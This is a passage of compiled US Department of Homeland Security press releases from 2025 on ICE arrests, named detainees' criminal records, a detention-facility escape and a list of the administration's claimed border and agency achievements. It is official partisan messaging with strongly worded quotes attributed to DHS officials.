Furthermore, ICE has not deported Luis Leon—a Chilean national—to Guatemala, as his family members have said. ICE’s only record of this individual entering the U.S. is in 2015 from Chile under the visa waiver program.

According to reporting by the Associated Press, the Guatemalan Institute of Migration—which coordinates with ICE on all deportations from the U.S. to Guatemala—claims they have not received anyone matching the name, age or nationality of Luis Leon back into Guatemala.

Image

According to the report, the family alleges a woman claiming to be an immigration lawyer called and offered to help them but did not disclose how she knew about the case. The family claims this individual also told them Leon died in ICE custody.

“ICE never arrested or deported Luis Leon to Guatemala. Nor does ICE ‘disappear’ people—this is a categorical lie being peddled to demonize ICE agents who are already facing an 830% increase in assaults against them. This was a hoax peddled by the media who rushed to press without pausing to corroborate the facts with DHS. This was journalistic malpractice,” said Assistant Secretary McLaughlin.

# # #

Source: US Department of Homeland Security

Both criminal illegal aliens involved in the attempted armed robbery were released into the country under the Biden Administration and NYC sanctuary politicians ignored detainer

NEW YORK – Today, the Department of Homeland Security arrested Cristian Aybar Berroa, a criminal illegal alien, and the second suspect involved in the attempted armed robbery of a U.S. Customs and Border Protection Officer who was off duty in New York City in Fort Washington Park under the George Washington Bridge on July 19. The first suspect, Miguel Francisco Mora Nunez, also a criminal illegal alien, who shot the CBP officer, was arrested yesterday.

A witness of the attack stated that she and the victim were sitting on the rocks by the water when two subjects on a scooter drove up to them, dismounted the scooter and approached them with a firearm drawn. The off-duty CBP officer responded by withdrawing his own firearm in self defense. The CBP officer was shot in his right arm and left cheek. Thankfully, the officer is in stable condition at the hospital.

Cristian Aybar Berroa, a criminal illegal alien from the Dominican Republic, illegally entered the United States on June 19, 2022, and was released into the country on interim parole pending his immigration hearing. New York City ignored his detainer.

Image

This criminal illegal alien’s rap sheet includes:

• On May 10, 2023, the New York City Police Department (NYPD) arrested Berroa for 2nd degree reckless endangerment.
• On March 26, 2024, NYPD arrested Berroa for 4th degree felony grand larceny and petit larceny.
• On April 5, 2024, NYPD arrested him 4th degree felony grand larceny and petit larceny. Despite an active ICE detainer, the New York City Department of Corrections released Berroa back onto NYC streets.
• On February 20, 2025, NYPD arrested Berroa for 2nd degree reckless endangerment, reckless driving, and for driving without a license.
• On June 12, 2025, Berroa pled guilty to petit larceny at the Bronx County Supreme Court. This plea was made in consolidation of all his previous arrests, and he was conditionally discharged and allowed to roam the streets of NYC.

A judge ordered Berroa a final order of removal on January 3, 2023.

The other assailant in the attack is Miguel Francisco Mora Nunez, a criminal illegal alien from the Dominican Republic. He illegally entered the United States on April 4, 2023, and was released by the Biden Administration into the country.

Image

This criminal illegal alien’s rap sheet includes:

• On October 11, 2023, the New York City Police Department (NYPD) arrested and charged Nunez with felony grand larceny, petit larceny, and reckless driving.
• On October 1, 2024, the NYPD arrested and charged Nunez with 2^nd and 3^rd degree assault.
• On November 30, 2024, the NYPD arrested Nunez for criminal contempt. On January 13, 2025, he was again attested for criminal contempt.
• On February 21, 2025, the Leominster Police Department in Massachusetts issued a criminal warrant for Nunez for armed robbery with a firearm.

After failing to show up for his immigration hearing a judge issued Nunez a final order of removal on November 6, 2024.

“These violent thugs had committed a smorgasbord of crimes and been arrested multiple times and yet New York continued to release them, ignore an ICE detainer and allow them to continue to prey on Americans and terrorize our streets. How many people have to die, how many lives have to be changed forever for Mayor Adams and his sanctuary politician ilk to end these performative politics?” said Assistant Secretary Tricia McLaughlin.

# # #

Source: US Department of Homeland Security

Under President Trump and Secretary Noem, ICE is working around-the-clock to remove the worst of the worst from American communities

WASHINGTON – Today, the Department of Homeland Security (DHS) released the names and rap sheets of criminal illegal aliens arrested over the weekend—including murderers, pedophiles, and rapists. 

“Over the weekend, our brave ICE agents arrested more depraved criminal illegal aliens including murderers, rapists, and three child pedophiles. These are the types of barbaric criminals our ICE law enforcement is arresting and removing from American communities every day,” said Assistant Secretary Tricia McLaughlin. “Despite an 830 percent surge in assaults against our ICE law enforcement officers, they continue to put their lives on the line to make American communities safer every day.”

Below are some of the criminal illegal aliens arrested over the weekend:

• ICE Dallas arrested Jose Arinaga-Ramirez, a 58-year-old illegal alien from Mexico, convicted of aggravated sexual assault of a child in San Antonio, TX. 

Image

• ICE Los Angeles arrested Chue Vue, a 37-year-old illegal alien from Laos, convicted of attempted murder and seven counts of assault with deadly weapon/instrument non-firearm that produced great bodily injury in Riverside, CA. 

Image

• ICE Philadelphia arrested Gil Salinas-Anaclo, a 35-year-old illegal alien from Peru, convicted of larceny in Northampton County, PA. 

Image

• ICE Houston arrested Gilmer Vertiz-Bustemante, a 37-year-old illegal alien from Mexico convicted of murder in Tarrant County, TX. 

Image

• ICE Buffalo arrested Andra Adams Scott, a 30-year-old illegal alien from Jamaica, convicted of attempted robbery in Queens County, NY. 

Image

• ICE Los Angeles arrested Henry Jose Marquez, a 55-year-old illegal alien from Venezuela, convicted of smuggling cocaine in Tampa, FL. 

Image

• ICE Boston arrested Jovinnel Giron Meneses, a 29-year-old illegal alien from the Philippines convicted of aggravated rape of a child, rape of a child with force, four counts of indecent assault and battery on a child under 14, and two counts of indecent assault and battery on a person over 14 in Middlesex, MA. 

Image

• ICE Philadelphia arrested Juan Ramirez-Velasquez, a 27-year-old illegal alien from Guatemala, convicted of rape of a victim under 12 years old in Dover, DE. 

Image

• ICE Atlanta arrested Emmanuel Evariste, a 39-year-old illegal alien from Haiti, convicted in the United States District Court, Boston District of conspiracy to possess with intent to distribute cocaine. 

Image

• ICE Buffalo arrested Sakir Akkan, a 22-year-old illegal alien from Turkey, convicted of rape three: anal sexual contact with a person incapable consent in Albany County, NY. 

Image

• ICE St. Louis arrested Nodir Negmatov, an illegal alien from Uzbekistan, who was attempting to pick up U.S. Department of State International Traffic in Arms Regulations (ITAR) controlled Joint Direct Attack Munition (JDAM) guidance kits, which convert unguided bombs into all-weather precision-guided munitions, at a Boeing plant in St. Charles, Missouri. 

Image

###

Source: US Department of Homeland Security

The suspect is a criminal illegal alien from the Dominican Republic was apprehended at the southern border and released into the country under the Biden Administration

Source: US Department of Homeland Security

President Trump and Secretary Noem stand with the victims of illegal alien crime

WASHINGTON — On July 19, 2025, U.S. Immigration and Customs Enforcement (ICE) officers in Chicago arrested Luis Mendoza-Gonzalez, a 52-year-old criminal illegal alien from Mexico, who was charged in April with concealing the body of a missing woman in a storage container on his yard for two months, abusing her corpse, and obstruction of justice.

Image

Waukegan Police Department officers discovered the body of 37-year-old victim Megan Bos in a container in Mendoza’s yard in April after she had been reported missing on March 9, 2025. 

Image

Her body was found decapitated and in a bleach storage container by officers. Mendoza was charged in April. However, Lake County Judge Randie Bruno released him from custody at the conclusion of his court appearance, where he was immediately allowed to freely roam the Chicago streets.

This criminal illegal alien is currently being held at Lake County Jail in Waukegan, Illinois.

“Everyday ICE is arresting sickos like criminal illegal alien, Luis Mendoza-Gonzalez, and stopping them from terrorizing Americans. This depraved alien was charged with concealing the body of a missing woman in a storage container for months and abusing her corpse,” said Assistant Secretary Tricia McLaughlin. “It is absolutely repulsive that a judge freed this monster and allowed him to walk free on Illinois’s streets after allegedly committing such a heinous crime. Under President Trump and Secretary Noem, Megan Bos and her family will have justice.” 

Secretary Noem relaunched the Victims of Immigration Crime Engagement (VOICE) office. The VOICE office was shuttered by the previous administration, which left victims of alien crime without access to many key support services and resources. The office was first launched in 2017 by the Trump administration as a dedicated resource for those who have been victimized by crime that has a nexus to immigration.

If you or a loved one has been impacted by a crime committed by an illegal alien, you are not alone. Call 1-855-48-VOICE (1-855-488-6423).

###

Source: US Department of Homeland Security

DHS has accomplished more in six months than most Administrations achieve in an entire term

WASHINGTON – In just six months, President Trump and Secretary Noem have delivered the American people a long list of victories in their mission to secure the homeland and Make America Safe Again. 

Under their leadership, the Department of Homeland Security (DHS) has closed the southern border, removed violent criminal illegal aliens, restored law and order to our immigration system, supported Americans in times of crisis, revolutionized our Coast Guard to meet the challenges of the 21st Century, and kept Americans safe. 

Secured the Southern Border 

• On day one, President Trump declared a national emergency at the southern border.    
• President Trump immediately reinstated “Remain in Mexico” and ended catch-and-release.  
• Daily border encounters have plunged by 93% since President Trump took office.
• Under President Trump’s leadership, Immigration and Customs Enforcement (ICE) Homeland Security Investigations (HSI) has located over 10,000 unaccompanied children.
• Migrants are turning BACK before they even reach our border— migration through Panama’s Darien Gap is down 99%.
• President Trump—with $46.5 billion from the Big Beautiful Bill—is finishing the border wall. DHS already has more than 85 miles either planned or under construction with funding from the prior year, in addition to hundreds of miles that are now planned to be funded by the bill. President Trump’s Big Beautiful Bill also includes over $5 billion for new technology and border surveillance.
• With the Big Beautiful Bill, CBP will get the resources they need to keep America safe, including $4.1 billion to hire additional personnel, including 5,000 more customs officers and 3,000 new Border Patrol agents.
• In June, Customs and Border Protection (CBP) had the lowest number of nationwide encounters in CBP history at 25,228.
• The number of nationwide apprehensions in June was also a historic low of just 8,024.   
• Notably, on June 28, Border Patrol recorded only 136 apprehensions across the entire Southwest Border—the lowest single-day total in agency history.
• And in both May and June, U.S. Border Patrol reported zero parole releases—reinforcing the Administration’s commitment to ending catch-and-release policies.   

Removed the Worst of the Worst Illegal Aliens  

• The Trump Administration empowered our brave men and women in law enforcement to use common sense to do their jobs effectively. 
• DHS returned to using the term “illegal alien” which is the statutory language. President Trump will not allow political correctness to hinder law enforcement. 
• The Trump administration has arrested more than 300,000 illegal aliens in 2025 alone.
• 70% of ICE arrests are criminal illegal aliens with criminal charges or convictions.     
• The Big Beautiful Bill will allow ICE to arrest and remove even more criminal aliens by providing $14.4 billion for removals, 10,000 new ICE agents, 80,000 new ICE beds, and a $10,000 signing bonus for new ICE agents. This will help ICE achieve as many as 1 million deportations per year.
• As part of 287(g), DHS partnered with the State of Florida and opened Alligator Alcatraz, giving the Trump administration the capability to lock up some of the worst scumbags who entered the country illegally under the previous administration. The new facility expands facility and bed space by the thousands.
• Operation Tidal Wave, the first 287(g) enforcement operation coordinated with state and federal law enforcement partners, resulted in over 800 arrests.
• President Trump and Secretary Noem are empowering state and local law enforcement to get these criminal illegal aliens off our streets. DHS has secured more than 800 signed agreements with state and local partnerships under 287(g).    
• At the direction of President Trump, CBP and ICE began widescale immigration enforcement operations in sanctuary city Los Angeles and southern California. The month-long operation resulted in arresting some of the worst of the worst criminal illegal aliens.
• In July, federal law enforcement officers executed criminal warrant operations at marijuana grow sites in Carpinteria and Camarillo. At least 14 migrant children have been rescued from potential exploitation, forced labor and human trafficking. Federal officers also arrested at least 361 illegal aliens from both sites in Carpinteria and Camarillo.
• After weeks of delays by activist judges, the Department of Homeland Security finally deported eight barbaric, violent criminal illegal aliens to South Sudan.    

Delivering Justice for Victims of Illegal Immigration  

• President Trump and Secretary Noem reopened the Victims of Immigration Crime Engagement (VOICE) office, which was shuttered by the Biden Administration. President Trump and Secretary Noem are standing up for the victims of illegal alien crime and ensuring they have access to much needed resources and support they deserve.    

Incentivizing Historic Self-Deportations 

• President Trump ended the CBP One app that allowed more than one million aliens to illegally enter the U.S. The Trump Administration replaced this disastrous program with the CBP Home app, which has a new self-deportation reporting feature for aliens illegally in the country.
• President Trump launched Project Homecoming through a presidential EO. The United States is also offering any illegal alien who uses the CBP Home App a stipend of $1,000 dollars, paid after their return to their home country has been confirmed through the app. So far, tens of thousands of illegal aliens have used the app to self-deport.  
• In addition to offering CBP Home, DHS announced illegal aliens who self-deport through the app will receive forgiveness of any civil fines or penalties for failing to depart the United States. DHS also made CBP Home more user friendly by eliminating certain steps and making it easier than ever for illegal aliens to self-deport.
• DHS and DOJ are enforcing our immigration laws and fining illegal aliens who do not depart when they are supposed to. So far, nearly 10,000 fine notices have been issued by ICE.  

Restoring Common Sense to America’s Legal Immigration System 

• President Trump ended the broad abuse of humanitarian parole and returned the program to a case-by-case basis. As part of this effort, Secretary Noem terminated the Cuba, Haiti, Nicaragua, and Venezuela parole programs.
• Following victory at the U.S. Supreme Court, DHS began sending termination notices in June, informing the illegal aliens both their parole is terminated, and their parole-based employment authorization is revoked – effective immediately.
• DHS has returned the Temporary Protected Status immigration program to its original status: temporary. No longer will this program be abused and exploited by illegal aliens. Secretary Noem rescinded the previous administration’s extension of Venezuelan, Haitian, Nicaraguan, Honduran, and Afghan TPS.
• Secretary Noem terminated Harvard University’s Student and Exchange Visitor Program (SEVP) certification—meaning Harvard can no longer enroll foreign students and existing foreign students must transfer or lose their legal status—for fostering violence, antisemitism, and coordinating with the Chinese Communist Party.
• It is a privilege, not a right, for universities to enroll foreign students and benefit from higher tuition to help pad their multibillion-dollar endowments. Harvard University repeatedly abused this privilege and even stonewalled DHS’s request for information.   

Initiating a Golden Age in American Air Travel 

• Secretary Noem terminated the politically motivated Quiet Skies Program, which since its existence has failed to stop a single terrorist attack while costing US taxpayers $200 million a year. The program, under the guise of “national security,” was used to target political opponents and benefit political allies.
• TSA ended the “shoes-off” travel policy, allowing passengers traveling through domestic airports to keep their shoes on while passing through security screening at TSA checkpoints. This change will drastically decrease passenger wait times at our TSA checkpoints, leading to a more pleasant and efficient passenger experience.
• The Trump administration fully implemented REAL ID enforcement measures nationwide—a law signed 20 years ago. REAL ID helps ensure that travelers are who they say they are and prevents fraud by criminals, terrorists, and illegal aliens. Most travelers have not even noticed a difference because nearly 94% of travelers are already REAL ID compliant.
• Secretary Noem ended collective bargaining for the Transportation Security Administration’s (TSA) Transportation Security Officers, which constrained TSA’s chief mission to safeguard our transportation systems.  

Fixing Disaster Relief for the 21st Century 

• The Federal Emergency Management Agency is now shifting from bloated, DC-centric dead weight to a lean, deployable disaster force that empowers state actors to provide relief for their citizens. The old processes are being replaced because they failed Americans in real emergencies for decades.
• President Trump has established the FEMA Review Council to provide recommendations on how to best conduct disaster relief at the federal level. 
• Under Secretary Noem’s leadership, the FEMA Review Council is developing a comprehensive plan for necessary change.
• DHS has empowered state and local governments to lead disaster relief efforts without interference from the federal government.  

Provided Rapid and Effective Support to Flood Victims in Texas 

• Within moments of the flooding in Texas, DHS assets, including the U.S. Coast Guard (USCG), CBP Border Search, CBP BORSTAR, and FEMA personnel surged into unprecedented action alongside Texas first responders for search and rescue operations.
• FEMA deployed 311 staffers delivering critical intelligence, aerial imagery, and shelter for 171 survivors.
• Combined state and federal rescue efforts evacuated and rescued over 1,500 people.   

Getting CISA Back on Mission 

• Under the Biden Administration, the Cybersecurity and Infrastructure Agency (CISA) censored free speech and targeted Americans.
• Under President Trump’s direction, DHS closed CISA’s politically weaponized offices and fired those responsible for abusing their power.
• CISA is now back on-mission: Protecting Americans and critical infrastructure from cyberthreats.
• CISA is shifting away from an all-hazards approach to a risk-informed approach, prioritizing resilience and action over mere information sharing. 
• CISA personnel are deployed across 10 regions in support of all 56 states/territories. 
• CISA is also on the front lines of defending America from cyberattacks. 
• CISA partnered with the FBI and NSA to ensure state and local governments have information and resources necessary for protection.
• CISA is also providing security support for next year’s FIFA World Cup.
• Secretary Noem discontinued the Critical Infrastructure Partnership Advisory Council (CIPAC) as a part of the implementation of President Trump’s Executive Order 14217, Commencing the Reduction of the Federal Bureaucracy, and removed members of the Cyber Safety Review Board (CSRB), which CISA oversees.  

Revolutionizing the Coast Guard 

• When President Trump came back into office, the Coast Guard faced its greatest readiness crisis since World War II because the Biden Administration left it underfunded and neglected.
• President Trump’s order to surge Coast Guard assets to our maritime border changed the game.
• In the first few months of the Trump Administration, the Coast Guard seized more cocaine and other illegal drugs than during the entirety of 2024.
• For the first time in years, the Coast Guard expects to exceed its recruiting goals.
• In Fiscal Year 2025, the Coast Guard has brought in more than 4,250 recruits – 1,200 more than the same time last year.
• That’s 108% over the goal.
• Under Biden, the Coast Guard fell short of its recruiting goals four years straight.
• Under President Trump and Secretary Noem, the Coast Guard is unleashing “Force Design 2028,” a revolutionary new blueprint that will make the Coast Guard more agile, more capable, and more responsive than ever before.  

Standing up for the American taxpayer 

• The United States Coast Guard (USCG) eliminated an ineffective information technology (IT) program, saving nearly $33 million, and is now focusing resources where they’re most needed to protect our homeland. 
• USCG partially terminated a wasteful Offshore Patrol Cutter (OPC) contract with Eastern Shipbuilding Group (ESG), which has been slow to deliver four OPCs, harming U.S. defense capabilities.
• The Trump Administration stopped aliens on the Terror Watchlist from receiving Medicaid benefits.     
• Secretary Noem cancelled CISA’s expensive headquarters project, saving taxpayers over half a billion dollars.  

To stop policies that were magnets for illegal immigration, DHS froze all funding to non-governmental organizations that facilitate illegal immigration and announced a partnership with the U.S. Department of Housing and Urban Development to ensure taxpayer dollars do not go to housing illegal aliens. 

###  

Source: US Department of Homeland Security

Operations across the U.S. target criminal illegal aliens convicted of burglary, kidnapping, and human trafficking

WASHINGTON — The Department of Homeland Security announced U.S. Immigration and Customs Enforcement (ICE) officers arrested removable criminal illegal aliens across the country on July 17, 2025, as part of coordinated enforcement targeting some of the worst of the worst in our communities. Among those taken into custody were previously deported felons, gang members, and individuals with long histories of violent criminal conduct.

Image

One of the most serious arrests was of Phong Thanh Nguyen, a criminal illegal alien from Vietnam, with a conviction for second-degree murder, indecent exposure, and a U.S. immigration judge issued a final order of removal in 2012. Nguyen was arrested by ICE Los Angeles officers after it was determined he had violated the terms of his supervision. Despite his murder conviction, indecent exposure, and removal order, Nguyen was released under an Order of Supervision in 2012 during the Obama administration. 

“A Vietnamese national murdered someone, exposed himself in public and remained on U.S. soil for years,” said Assistant Secretary Tricia McLaughlin. “ICE has a duty to protect the American public from criminal illegal aliens. President Trump and Secretary Noem will not allow convicted criminal illegal alien killers to hide behind outdated policies. Our message to criminal illegal aliens is clear, leave now. If you don’t, we will find you and deport you, and you will never return.” 

ICE continues to target and remove the worst offenders—those who pose the greatest threat to the safety and security of American communities. Nguyen remains in ICE custody pending removal procedures.  

ICE agents across the country carried out similar arrests of criminal illegal aliens with serious convictions, including: 

• Abraham Taddesse, an illegal alien from Ethiopia, convicted of rape in the second degree in Upper Marlboro, Maryland.

Image

• Juan Felix Yanes-Montano, a criminal alien from Cuba, convicted of robbery with a deadly weapon, armed burglary, and kidnapping with a deadly weapon in Miami-Dade County, Florida. 

Image

• Cesar Porras, an illegal alien from Mexico, convicted of possession with intent to distribute a quantity of a mixture and substance containing fentanyl in Pecos, Texas. 

Image

• Eduardo Salinas-Gonzalez, an illegal alien from Mexico, convicted of smuggling aliens, escape, and two illegal re-entries in Zapata County, Texas. 

Image

###

Source: US Department of Homeland Security

The criminal illegal alien fled the Newark facility and ICE captured him in Los Angeles after a month-long manhunt

WASHINGTON – The Department of Homeland Security (DHS) today announced U.S. Immigration and Customs Enforcement (ICE) captured an illegal alien detainee who escaped the Delaney Hall Detention Facility in Newark, New Jersey. The individual—Andres Pineda-Mogollon—is one of four dangerous criminal illegal aliens who escaped Delaney Hall on June 12, 2025. He is the final detainee to be captured. 

“We are tremendously grateful to our brave ICE agents and law enforcement partners for capturing Andres Pineda-Mogollon and the other three dangerous criminal illegal aliens who escaped Delaney Hall. Politicians and activists relentlessly try to smear ICE—but the facts remain true: Delaney Hall houses dangerous criminals, including these four fugitives who committed aggravated assault, burglary, theft and even threatened to kill law enforcement,” said Assistant Secretary Tricia McLaughlin. “Now, these slimeballs no longer pose a threat to public safety.” 

CAPTURED:

Image

On July 17, 2025, Andres Pineda-Mogollon, an illegal alien from Colombia, was arrested by ICE in Los Angeles, California. He overstayed a tourist visa and entered the U.S. in 2023 under the Biden administration. On April 25, 2025, the New York City Police Department arrested Pineda-Mogollon for petit larceny. On May 21, 2025, the Union, New Jersey Police Department arrested Pineda-Mogollon for residential burglary, conspiracy residential burglary, and possession of burglary tools.

Image

On June 13, 2025, Joel Enrique Sandoval-Lopez, a criminal illegal alien from Honduras, was arrested by ICE, FBI, and Passaic Police in Passaic, New Jersey. During the arrest, Sandoval-Lopez kicked and threatened to kill the law enforcement officers. This criminal illegal alien’s criminal record includes unlawful possession of a handgun and aggravated assault.

Image

On June 13, 2025, Joan Sebastian Castaneda-Lozada, a criminal illegal alien from Colombia whose criminal record includes arrests for burglary, theft, and conspiracy to commit burglary, attempted to turn himself in to local authorities at the New Jersey State Police Bridgeton Station. Due to their sanctuary policies, the State Police refused to take him into custody because they do not work with ICE. On June 15, Castaneda-Lozada surrendered himself to Agents from FBI and ICE in Milleville, New Jersey. 

Image

Franklin Norberto Bautista-Reyes is an illegal alien from Honduras who illegally entered the U.S. in 2021 under the Biden administration. On May 3, 2025, the Wayne Township, New Jersey Police Department arrested Bautista for aggravated assault, attempt to cause bodily injury, terroristic threats, and possession of a weapon for unlawful purposes.

###